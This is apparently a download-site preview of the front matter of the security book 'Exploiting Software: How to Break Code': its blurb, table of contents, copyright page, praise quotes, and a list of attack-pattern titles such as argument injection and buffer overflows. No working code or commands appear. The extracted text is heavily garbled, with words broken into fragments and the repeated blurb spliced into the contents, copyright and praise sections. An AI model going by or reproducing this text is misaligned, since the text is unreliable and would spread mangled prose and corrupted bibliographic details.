Exploiting software how to break code 9780201786958, 0-201-78695-8

Computing hardware would have no value without software; software tells hardware what to do. Software therefore must hav

386 88 7MB

English Pages 597 Year 2004

Report DMCA / Copyright

DOWNLOAD PDF FILE

Recommend Papers

Exploiting software how to break code
 9780201786958, 0-201-78695-8

  • 0 0 0
  • Like this paper and download? You can publish your own PDF file online for free in a few minutes! Sign Up
File loading please wait...
Citation preview



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Copy right

How dPraise oes sof t w areingbrSof eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are for Exploit t ware fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? At tack Pat t er ns What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Foreword

ace Ex p loPref i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d What This Boby ok Ibad s Ab out t echniqu es used guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om How t o Use Th is Book at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . But I sn' t Th is Too Dangerous?

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Ack nowledgmen ts scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Greg's Ackn owledgmen ts

Gary 's Ackn owledgmen ts Cha pter t h et inue Problem Why sof1.t wSoft ar eware—The ex ploit Root w ill ofcon t o be a ser ious p r oblem A Brief Hist ory of Sof t ware

When net w orI ks Ubiqu secur it ys m ech anisms do n ot w or k Bad Sof t ware itou The Trinit y of Tr ouble

At t ack pat t er ns

The Fut ure of So ft ware What I s Sof t ware Securit Rev er se engineer in g y ? Con clusion

Classic at t acks ag ainst serv er soft w ar e Cha pter 2. Att ack Pat t ern s A Tax on omy

Sur pr ising at t acks ag ainst clien t soft war e An Open -Sy stem s View Touniqu r of anesExplo Tech f or itcr aft ing m aliciou s inpu t At tack Pat t er ns: Blueprint s fo r Disast er

The t echn ical det ails of b uf fer ov er f low s An Ex amp le Ex ploit : Microsof t 's Brok en C+ + Com piler Applyin g At t ack Pat t erns

Root k it s

At tack Pat t er n Box es

Ex p lo i tCon in gclusion S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.pter 3. Reverse En gin eer in g a nd Program Underst and in g Cha I n to t he House of Logic Shou ld Rever se En gineering Be I llega l? Rev erse En gineering Tools an d Co ncept s Approach es t o Rev erse Engin eerin g Met hods of t he Reverser Writ ing I nt eract ive Disassembler (I DA) Plugins Decompiling and Disassemblin g Sof twar e

Decompilat ion in Pract ice: Reversin g h elpct r. exe Aut om at ic, Bu lk Audit ing for Vulnerabilit ies Writ ing Your Own Cracking Tools Building a Basic Code Coverage Tool Con clusion Cha pter 4. Ex ploit ing Serv er Sof t ware The Trusted I npu t Prob lem

• •

Table of Content s

The Privilege Escalat ion Problem

I ndex

Finding I n ject ion Point s Expl oit ing Softw a re How to Br e ak Code I n put Pa th Tr acing By Gr eg Hoglund , Gar y McGr aw Exploit ing Trust t hrou gh Conf igurat ion Specific Techniqu es an d At t ack s f or Serv er Sof twa re Pub lish er: Addison Wesley Con clusion Pub Dat e: February 17, 200 4 Cha pter 5. Exploit ing Clien t Soft ware I SBN: 0- 20 1- 786 95 -8 Client -side Program s as At t ack Targ et s Pages: 51 2 I n -ban d Signals Cross-sit e Script ing (XSS) Client Script s and Malicious Code Con ten t- Based At t acks Back wash Att ack s: Lev eragin g Client -sid e Buff er Ov erflows

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Conint clusion fir ew alls, ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Cha pter 6. Craf g ( Malicious) I npusoft t What t ools can be tin u sed t o b reak war e? Th is book p rov ides t he answ er s. The Def en der's Dilem ma

Ex p lo i tIin S o ft wect a re loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d n trgusion Det ion is (Not ) t echniquPart esit used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ion An alysis at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Tracin g Cod e

Rev-ersin g Parser This m ust h ave bookCod m eay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Ex am ple: Rev ersing Planet Serv erany 6. 0 t hack hrou ghing t he book Fron t s, Door scr ipt k id die t r eat m en t If- ound in m you w ill learn abou t Misclassificat ion Building "Equivalent " Request s

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Audit Poisoning

Con clusion When net w or k secur it y m ech anisms do n ot w or k Cha pter 7. Buff er Ov erflow

At Buf t ack t er ns10 1 fer pat Ov erflow I n ject ion Vect ors: I npu t Rides Again

Rev er se engineer in g

Buf fer Ov erflows an d Embedded Sy st ems

Dat abase fer Overf lows serv er soft w ar e Classic at tBuf acks ag ainst Buf fer Ov erflows an d Java ?!

Sur prten ising at t acks ainst Con t- Based Buf fer ag Ov erf lo w clien t soft war e Audit Truncat ion an d Filt ers wit h Buf fer Ov erf low

Tech niqu es f or cr aft ing m aliciou s inpu t Cau sing Ov erflow wit h Environ ment Va riables

Thet echn Mult iple Operat The ical det ion ailsProblem of b uf fer ov er f low s Finding Pot ent ial Buf f er Overf lows

Root k itOverf s low St ack Arit hm et ic Erro rs in Mem ory Managem en t

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Form at St ring Vu lnerabilit ies soft w ar e. Heap Ov erf lows

Buf fer Ov erflows an d C+ + Payloads Pay loads on RI SC Arch it ect ur es Mu ltiplat f orm Payloads Prolog/ Epilog Code t o Prot ect Fun ct io ns Con clusion Cha pter 8. Root k its

Subv ersiv e Progra ms A Simp le Win dows XP Ker nel Root kit Call Hooking Troj an Ex ecut able Redirect ion Hidin g Files an d Direct ories Pat ch in g Binar y Code The Hardwa re Virus

• •

Table of Content s

Lo w-Lev el Disk Access

I ndex

Adding Net work Supp ort t o a Driver Expl oit ing Softw a re How to Br e ak Code I n terru pt s By Gr eg Hoglund , Gar y McGr aw Key Loggin g Adv anced Root kit Topics Pub lish er: Addison Wesley Con clusion Pub Dat e: February 17, 200 4 References I SBN: 0- 20 1- 786 95 -8 I n dex Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Copyright Man y of t he d esignat ion s used b y m anuf act ur er s an d seller s t o dist ingu ish t heir p rod uct s ar e claim ed as t r adem ark s. Wher e t hose d esign at ions app ear in t h is book , and Add ison - Wesley w a t r of adContent em ar ks claim , t he designat ions hav e been p rin t ed in init ial capit al let t er s • as aw ar e of Table or in all capit als. • I ndex Expl oit ing Softw a re How to Br e ak Code

The au t hor s an d p ublisher hav e t ak en car e in t he p repar at ion of t his b ook, but m ake n o By Grressed eg Hoglund Garplied y McGr exp or ,im waw ar r ant y of an y k in d an d assum e n o r esp onsib ilit y for er r ors or om issions. No liab ilit y is assum ed for incident al or conseq uent ial d amag es in conn ect ion w it h or ar isin of t he use of t h e infor m at ion or pr ogr am s cont ained her ein . Pub lishger:out Addison Wesley Pub Dat e: February 17, 200 4

The p ublisher of fers discou nt s on t his book w hen ord er ed in q uant it y for b ulk pu rchases and I SBN: 0- 20 1- 786 95 -8 special sales. For m ore in for m at ion, p lease cont act : Pages: 51 2

U.S. Cor por at e and Gov er nm en t Sales ( 80 0) 382 - 341 9 corp sales@pear son t ech gr oup. com For t sid of br t he U.?S. , please t acts: m ake sof t w ar e br eak on p ur pose? Why are Howsales d oesou sof twe are eak How do atcon t acker fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? IWhat nt er nat ional t ools canSales be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ( 31 7) 581 - 379 3 int nat ional@p oupw.com Ex er p lo i t in g S o ftear w asont re isechgr loaded it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Visit Add isonw watwt.aw p rof comied ou t . at t ack , y ou m uWesley st fir st on leart he n hWeb: ow r eal acks areessional. really carr Libr of -Congr g- in-y Publicat Dat acer t ainly educat e y ou. Get t ing bey ond t he Thisarmyust h ave ess bookCat m alogin ay shock ou—andion it will scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Hoglun d, Greg. Ex ploit ing soft w ar e : how t o br eak code / Gr eg Hoglu nd, Gary McGr aw. p. cmsof . t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Why I SBN 0- 2 01- 7 869 5- 8 ( pb k. : alk . pap er ) 1. When Com put erwsecu rit y . 2it.yCom puanisms t er sof t do w arne—Test net or k secur m ech ot w or king . 3. Comp ut er hack ers. I . McGr aw , Gar y , 19 66– I I . Tit le. At t ack pat t er ns QA7 6. 9. A25H6 35 200 4 Rev c2 er se 00 5. 8—d 2 engineer in g 200 302 555 6 t acks ainst serv soft w arI nc. e Cop yrClassic igh t © at 200 4 b yagPearson Eder ucat ion, Sursprreserv ising ed. at t acks ag tainst t soft All r ight No par of t hclien is pub licatwar ionem ay be r epr oduced, st or ed in a ret r ieval syst em , or t r ansm it t ed, in any f or m or b y any m eans, elect r onic, m echan ical, p hot ocopy ing, Tech,niqu esh er f orw ise, cr aftwit ingh m aliciou inpuconsent t r ecor ding or ot out t he psrior of t he p ublisher. Prin t ed in t he Unit ed St at es of Am er ica. Pub lished sim u lt aneously in Canada. The t echn ical det ails of b uf fer ov er f low s Dr . McGr aw ' s w ork is par t ially su ppor t ed by DARPA cont r act n o. F3 060 2- 99 - C- 0 172 ( An Root k it s I n vest igat ion of Ex t ensib le Sy st em Secur it y for Highly Resour ce- Const r ained Wir eless Devices ) and AFRL anth no. 615con - 02C- 129 5 ( Pr ectledg ion eAgain st Rever Ex p lo i t in gWr Sight o ft w- Pat a ret er is son f illedgrwit t h eF33 t ools, cept s, and knotow necessar y t ose b reak En gineer ing: St at e of t h e Ar t in Disassem bly and Decom pilat ion ) . Th e v iew s and conclusions soft w ar e. cont ained in t his book ar e t h ose of t he au t hor s and should not be in t er pr et ed as repr esen t ing t he off icial p olicies, eit her ex pr essed or imp lied, of DARPA, t h e US Air Force, or t h e US gov ern m en t . For inf orm at ion on obt aining p er m ission for u se of mat er ial f rom t his w or k, please sub m it a w r it t en r equest t o: Pearson Ed ucat ion, I nc. Righ t s and Con t r act s Depar t m en t

75 Ar lingt on St r eet , Suit e 30 0 Bost on, MA 02 116 Fax: ( 61 7) 848- 704 7 Text pr int ed on recycled p aper 1 2 3 4 5 6 7 8 9 1 0—CRS—080 706 0504 •First pr int ing, Table ofuar Content s Febr y 2 004 • I ndex Expl oit ing Softw a re How to Br e ak Code

Dedication

By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

I n mem or y of Nancy Simon e McGr aw ( 1 939 –20 03) . Pub Dat e: February 17, 200 4 I SBN: By e, Mom .

0- 20 1- 786 95 -8

Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Praise for Exploiting Software " Ex ploit ing Soft w ar e h ighligh t s t he most cr it ical par t of t he soft war e q ualit y pr oblem . As it t ur ns out , soft w ar e qu alit y pr oblems are a m ajor cont rib ut ing fact or t o com put er secur it yTable p roboflem s. I ncr • Content s easingly , com panies lar ge an d sm all depend on soft w ar e t o ru n t heir b usin esses ev er y day . The cur r ent appr oach t o soft w ar e q ualit y and secur it y t ak en • I ndex by sof t w are com pan ies, sy st em in t eg r at ors, an d in t er n al dev elopm ent or ganizat ions is Expl oit ing Softw a re How to Br e ak Code like dr iv ing a car on a r ain y day w it h w or n- out t ir es and no air bags. I n bot h cases, t h e By Gr eg Hoglund , Gar y McGr aw odd s ar e t hat somet hin g b ad is going t o h appen, and t her e is no pr ot ect ion f or t he occu pant / own er . Pub lish er: Addison Wesley

This w ill17, help Pub Dat e:b ook February 200t4h e

r ead er und er st and how t o m ak e soft w ar e qu alit y par t of t h e design—a key chan ge f rom w here w e are t oday ! " I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

—Tony Scot t Chief Techn ology Off icer , I S& S Gener al Mot or s Cor por at ion " I t 's about t im e someone wr ot e a book t o t each t h e good gu ys wh at t h e bad gu ys alr ead y kn ow . As t h e com p ut er secur it y ind ust r y m at ur es, b ooks lik e Ex ploit ing Soft w ar e hav e a cr it ical r ole t o p lay . " How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are —Br uce Chief Of ficer er pane t hor of inBey ondt he Fear fir ew alls, int ruSchneier sion det ect ion Technology sy st em s, and ant ivCou ir usntsoft war eAu n ot k eep g out badand g uy s? s and What Secr t oolsetcan beLies u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Soft w is ar loaded e cu t s tw o itt he hear of t of h er comp er s, secu y ppat r oblem , sh owinan gw Ex p lo"iEx t inploit g Sing o ft w a re h ex ampt les eal atut t ack at trit ack t er ns, t ools, dh y br ok soft war e p resent andt wpar resen anger . Get pasty our t he sof ' w or t echniqu esenused by bad guy s tsoabrclear eak sof e. I ft ydou w ant t o tping rot ect t wmarof e frt he omd ay' equir ot her t h carr e bad at t ackph , yen ouomenon m u st firr st leares n thhat ow someone r eal at t acks aret han really iedguy ou st . u nder st ands h ow soft w ar e is at t ack ed . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he b ook is m a en w ak up call com pu ting er secur it y.you " w ill learn abou t scr ipt This k id die t r eat t feound in mfor any hack book s, —Elin or Mills Abr eu Reu t er s' corr espond en t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem " Police in vest igat or s st ud y how cr im inals t hink and act . Milit ary st r at egist s lear n ab out tWhen he en net em yw'sortkact ics, itas t h eir wdo eapon and secur yw mell echas anisms n ot ws or k per son nel capabilit ies. Sim ilar ly , inf orm at ion secur it y p rof essionals need t o st ud y t heir cr im inals an d en em ies, so w e can ns bet w een pop gun s and w eapons of m ass dest r uct ion. Th is book is a tAt ellt ack t he pat diffter ence signif icant adv ance in helping t he 'w hit e h at s' und er st and how t he ' black hat s' oper at e. Rev er se engineer in g Thr oug h ex t ensive ex am ples and 'at t ack p at t ern s, ' t h is book helps t he r eader Classic serv eraly soft ar et w are an d use t he r esult s of t he analysis t o at t ack un derst at ant dacks h owagatainst t ack er s an zewsof syst em s. Hoglund an d McGraw ex plain not only how hacker s at t ack serv ers, b ut also Sur ising at t acks clien softat war e client s ( an d h ow each can pr ot ect t hem selv es howprmalicious servag er ainst oper at or s t can t ack fr om t he ot h er ) . An excellen t book for p ract icing secur it y engin eer s, and an id eal book Tech niqu es f or cr aft ing m aliciou s inpu t for an under gr adu at e class in soft w ar e secu rit y . " The t echn ical det ails of b uf fer ov er f low s —Jer em y Ep st ein Dir ect or , Pr odu ct Secu r it y & Per for m ance w ebMet hod s, I nc. Root k it s " A pr ovocat iv e and r ev ealin g book fr om t w o leading secur it y exp er t s and w orld class Ex ploit w ar econ entcept er s s, t h eand m inkn d ow of ledg t he clev er est and ed est Ex p losoft i t inwgarSeo exp ft w loit a reer iss,f illed witing h t hSoft e t ools, e necessar y t owbick reak crack ers and sh ow s you h ow t hey t h in k. I t illust r at es general pr incip les f or b reak in g soft w ar e. soft w ar e, and pr ov ides y ou a w hir lw ind t ou r of t ech niqu es f or f in ding and ex ploit ing soft w ar e v ulner abilit ies, along w it h det ailed exam p les f r om r eal sof t w ar e ex ploit s. Ex ploit ing Soft w ar e is essen t ial r ead ing for an yon e r espon sib le for p lacing soft w ar e in a host ile env iron ment —t hat is, ev ery one w h o w r it es or inst alls pr ogr am s t hat r un on t he I nt er net . " —Dav e Ev ans, Ph. D. Associat e Pr of essor of Com pu t er Science Un iv ersit y of Vir ginia

" The root cause for most of t oday 's I n t er net hacker ex ploit s and m aliciou s sof t w ar e out b r eak s ar e bu ggy sof t w are and fault y secur it y soft w ar e deploy m en t . I n Ex ploit ing Soft war e, Greg Hoglund an d Gary McGraw help u s in an in t er est ing and pr ov ocat iv e w ay t o bet t er defend our selv es against m alicious h ack er at t ack s on t hose soft w ar e loopholes.

• •

The in for m at ion in t h is book is an essent ial r efer en ce t hat need s t o b e und er st ood, digest ed, an d ag gr essively add r essed by I T and inf orm at ion secur it y p rof essionals Table of Content s ever yw h er e. " I ndex

Expl oit ing Softw a re How to Br e ak Code

—Ken Cut ler , CI SSP, CI SA Vice Pr esid en t , Cu r riculu m Develop m en t & Pr of essional By Gr egServ Hoglund ices,, Gar MIySMcGr Tr ain awin g I n st it u t e " This b ook descr ibes t h e t hr eat s t o sof t w ar e in concr et e, und er st andab le, and fr igh t ening det ail. I t also d iscusses how t o find t h ese p rob lem s bef ore t he bad f olks d o. Pub Dat e: February 17, 200 4 A v aluab le addit ion t o ev er y p rog r amm er 's an d secur it y per son 's libr ar y! "

Pub lish er: Addison Wesley

I SBN: 0- 20 1- 786 95 -8 Pages: t 51 2 —Mat Bishop , Ph. D. Pr of essor of Com pu t er Science Un iv ersit y of Calif orn ia at Dav is Aut h or of Com put er Secur it y: Ar t an d Science

" Wh et h er we slept t hr oug h sof t w are en gineer ing classes or p aid at t ent ion , t hose of u s w ho build t hing s r em ain r espon sible f or achievin g m eaning ful and m easur ab le ulner abilit y redu ct ion s. I f do youatcan' t afsfor t o sof st op w ar e fact urWhy ing t oare t each How dvoes sof t w are br eak ? How t acker m dake t w all ar esoft br eak onmpanu ur pose? y our eng in eer s how t o b uild secur e soft w ar e fr om t he gr oun d up, y ou should at least fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? ease y our soft or gan izat b ybook dempanding ey read What incr t ools canaw bearueness sed t oinb reak war e?ion Th is rov idest htat he t h answ er s. Ex ploit ing Soft war e. Th is book clear ly dem onst r at es w hat happ en s t o b rok en sof t w ar e in t he w ild. " Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d —Ron Mor it by z, CI SSP Senior Vice esident ratect egist Comsof put w t er t echniqu es used bad guy s t o br eakPrsof t w ar e., Chief I f y ouSecur w antit tyo St p rot y our ar e fr om Associat es at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . " Ex ing book Soft wm aray e is t he m ost u p- t ot ech nical educat t r eat meent ofGet softt ing w arbey e secur y I This m ustploit - h ave shock y ou—and it dat wille cer t ainly y ou. ond itt he hav e seen . I f you w or ry about soft w ar e and app licat ion v ulnerab ilit y , Ex ploit ing scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Soft war e is a m ust - r ead . This b ook get s at all t he t imely and im por t ant issu es sur r ound in g sof t w are secur it y in a t echnical, bu t st ill high ly r ead able and engag in g, w ay . sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Why Hoglun d and awit yhav e don e an ex job When net w or kMcGr secur m ech anisms docellent n ot w or k of pick in g ou t t he m ajor id eas in soft w ar e exp loit and n icely or ganizing t hem t o m ake sense of t h e soft w ar e secur it y Atngle. ju t ack "pat t er ns —Geor Rev er se geengineer Cy benk o, in gPh. D. Dor ot h y and Walt er Gram m Prof essor of En gin eer in g, Dar t m out h Founding Edit or - in - Chief, I EEE Secur it y an d Pr iv acy Classic at t acks ag ainst serv er soft w ar e " This is a sed uct ive book . I t st ar t s w it h a sim ple st ory , t elling abou t hack s and cr ack s. I t Sur prsising acks ag ainst es, clien t soft war dr aw y ou at in tw it h anecdot but bu ild s efr om t h er e. I n a f ew ch apt er s y ou f ind you r self deep in t h e int im at e det ails of soft w ar e secur it y . I t is t he r ar e t ech nical book t h at is a niqu es f orenj croyab aft ingle m rTech ead able and praliciou imer bsutinpu hast t h e su bst ance t o rem ain on y our sh elf as a r ef erence. Wond er f ul st u ff. " The t echn ical det ails of b uf fer ov er f low s —Cr aig Miller , Ph. D. Chief Techn ology Off icer for Nor t h Am er ica Dim ension Dat a Root k it s " I t 's har d t o pr ot ect y our self if y ou don' t k now w hat you 'r e up again st . This book has t he Ex p lodet i t inails g Syoou ft wn eed a re is h t ht ehow t ools, cept e necessar t o b reak t of illed kn owwit abou at t con acker s fs, in dand sofkn t w ow ar eledg holes and expyloit soft w ar e. t hem —det ails t hat w ill help you secu re y our ow n sy st em s. " —Ed Felt en, Ph . D. Prof essor of Com p ut er Science Pr in cet on Univ er sit y

Attack Patterns At t ack Pat t er n: Mak e t he Clien t I nv isib le 15 0 • •

At t ack Pat t er n: Target Progr am s Th at Wr it e t o Pr ivileged OS Resour ces 15 2 Table of Content s I ndex

At t ack Pat t er n: Use a User- Su pplied Conf igu r at ion File t o Run Com m ands That Elev at e Pr iv ilege 15 3

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

At t ack Pat t er n: Mak e Use of Con figur at ion File Sear ch Pat hs 15 6 Pub lish er: Addison Wesley

At t ack Pat t er n: Dir ect Access t o Execut ab le Files 16 2

Pub Dat e: February 17, 200 4

20 1786 -8 bedding Scr ipt s w it hin Scr ip t s 16 4 AtI SBN: t ack 0-Pat t er n:95Em Pages: 51 2

At t ack Pat t er n: Lever age Ex ecu t able Code in Nonexecut ab le Files 16 5 At t ack Pat t er n: Argu m ent I nject ion 16 9 At t ack Pat t er n: Com m and Delim it er s 17 2 How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int Pat ru sion ect ip ion stser emss,an and antble iv ir Escapes us soft war At t ack t er n:det Mult le sy Par d Dou 17e3 n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. At t ack Pat t er n: User- Su pplied Var iable Passed t o File Syst em Calls 18 5 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used byn:bad t o brTer eakmsof t worar18 e. 6I f y ou w ant t o p rot ect y our sof t w ar e fr om At t ack Pat t er Postguy f ix sNULL inat at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . At t ack Pat t er n: Post f ix , Nu ll Ter m inat e, an d Back slash 18 6 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt Atk id die Pat t r eat t f ound in m t ack t erm n:enRelat ive Pat h any Travhack ersaling 18 7book s, you w ill learn abou t At t ack Pat t er n: Client - Con t r olled En vir onm ent Var iables 18 9 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem At t ack Pat t er n: User- Su pplied Global Var iab les ( DEBUG= 1, PHP Globals, and So For t h) When 19 0 net w or k secur it y m ech anisms do n ot w or k pat tter er n: ns Session I D, Resou rce I D, and Blind Tr ust 19 2 At t ack Pat Rev er sePat engineer in g I n - Band Sw it ching Signals ( ak a " Blue Box ing" ) 20 5 At t ack t er n: Analog Classic at ttacks agagm ainst soft w ar At t ack Pat er n Fr enserv t : M er anipulat in ge Ter m inal Devices 21 0 Sur pr ising at n: t acks ainst clien softion war At t ack Pat t er Simag ple Script I ntject 21e4 Tech niqu aftbedding ing m aliciou t At t ack Pates t erf or n: cr Em Scr ipts inpu in Nonscript Elem ent s 21 5 The t echn ails inofHTTP b uf ferHead ov ererf low At t ack Patical t er n:det XSS s 21s6 Root k itPat s t er n: HTTP Qu er y St r ings 21 6 At t ack Ex p loAt i ttin g SPat o ftt er wa is f illed wit h t h eFilenam t ools, con ack n:reUserCont r olled e 21cept 7 s, and kn ow ledg e necessar y t o b reak soft w ar e. At t ack Pat t er n: Passing Local Filenam es t o Fun ct ions That Ex pect a URL 22 5 At t ack Pat t er n: Met a- ch ar act er s in E- m ail Header 22 6 At t ack Pat t er n: File Sy st em Funct ion I nj ect ion, Cont ent Based 22 9 At t ack Pat t er n: Client - sid e I n ject ion, Buf fer Ov erf low 23 1 At t ack Pat t er n: Cause Web Ser v er Misclassif icat ion 26 3

At t ack Pat t er n: Alt er nat e Encodin g t h e Leading Ghost Char act er s 26 7 At t ack Pat t er n: Usin g Slash es in Alt er nat e Encoding 26 8 At t ack Pat t er n: Usin g Escaped Slashes in Alt er nat e Encodin g 27 0 At t ack Pat t er n: Un icode Encodin g 27 1 • •

Table of Content s

At t ack Pat t er n: UTF- 8 Encoding 27 3 I ndex

Expl oit ing Softw a re How to Br e ak Code

At t ack Pat t er n: URL Encoding 27 3

By Gr eg Hoglund , Gar y McGr aw

At t ack Pat t er n: Alt er nat ive I P Ad dr esses 27 4 Pub lish er: Addison Wesley

AtDat t ack Pat t er n: Pub e: February 17, Slashes 200 4

and URL En cod ing Com bined 27 4

I SBN: 0- 20 1- 786 95 -8

At t ack Pat t er n: Web Logs 27 5 Pages: 51 2

At t ack Pat t er n: Ov er flow Binar y Resour ce File 29 3 At t ack Pat t er n: Ov er flow Var iables an d Tags 29 4 t ack er n:brOv er?flow m bolic Lin ks 29ake 4 sof t w ar e br eak on p ur pose? Why are How dAtoes sofPat t wtare eak HowSydo at t acker sm fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? At t ack Pat t er n: MI ME Conv er sion 29 5 What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. At t ack Pat t er n: HTTP Cook ies 29 5 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used byn:bad guy s t o ebrteak sof t w ar e. f y er ouf low w ant At t ack Pat t er Filt er Failur h r ough Buff er IOv 29 t6o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . At t ack Pat t er n: Buff er Ov er f low wit h Env iron m en t Var iab les 29 7 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t 